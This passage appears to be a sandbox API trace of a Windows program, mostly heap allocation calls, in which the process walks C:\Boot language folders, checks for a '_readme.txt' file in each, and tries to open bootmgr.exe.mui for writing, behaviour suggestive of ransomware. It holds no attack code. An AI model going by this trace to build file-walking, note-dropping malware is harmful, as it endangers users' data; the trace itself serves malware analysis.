dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.009] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.009] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.009] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.009] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.009] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.009] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.009] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0093.009] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.009] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.009] PathFindFileNameW (pszPath="") returned="" [0093.009] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.010] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.010] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.010] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.010] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.010] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0093.010] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.010] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0093.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.010] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.010] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0093.010] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.010] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3267ea0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3267ea0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0093.011] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.011] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3267ea0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3267ea0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.011] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175990 [0093.011] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.011] PathFindExtensionW (pszPath="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned=".mui" [0093.011] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.011] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175990 | out: hHeap=0x680000) returned 1 [0093.011] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3267ea0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3267ea0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3267ea0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175990 [0093.011] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.011] PathFindExtensionW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned=".txt" [0093.011] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175990 | out: hHeap=0x680000) returned 1 [0093.012] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3267ea0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3267ea0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3267ea0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.012] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0093.012] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.012] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0093.012] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef540 [0093.012] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.012] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.012] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.012] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.014] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0093.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 